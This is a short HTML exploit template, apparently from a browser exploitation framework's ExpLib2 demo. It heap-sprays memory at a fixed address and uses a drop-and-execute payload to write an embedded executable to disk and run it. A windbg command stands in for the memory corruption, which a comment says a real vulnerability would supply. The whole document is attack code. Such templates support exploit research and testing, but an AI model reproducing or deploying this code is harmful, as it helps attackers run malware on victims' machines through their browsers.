<html>
<head>
  <script>
    <%= js_explib2_payload("drop_exec") %>
  </script>
  <script>
    <%= js_explib2 %>
  </script>
</head>
<body>
<script>
var pe_exe = "<%= exe_js %>"

var num_arrays = 98688;
var arr_size = (0x1000 - 0x20)/4;
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_drop_exec(pe_exe) );
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
explib.spray();

/*
* Modify array length
* In the real world exp, you  need to modify the array length field with your vulnerability
*/
alert( 'Execute the command in windbg: "ed 1a1b3000+18 400"' );

explib.go();

</script>
</body>
</html>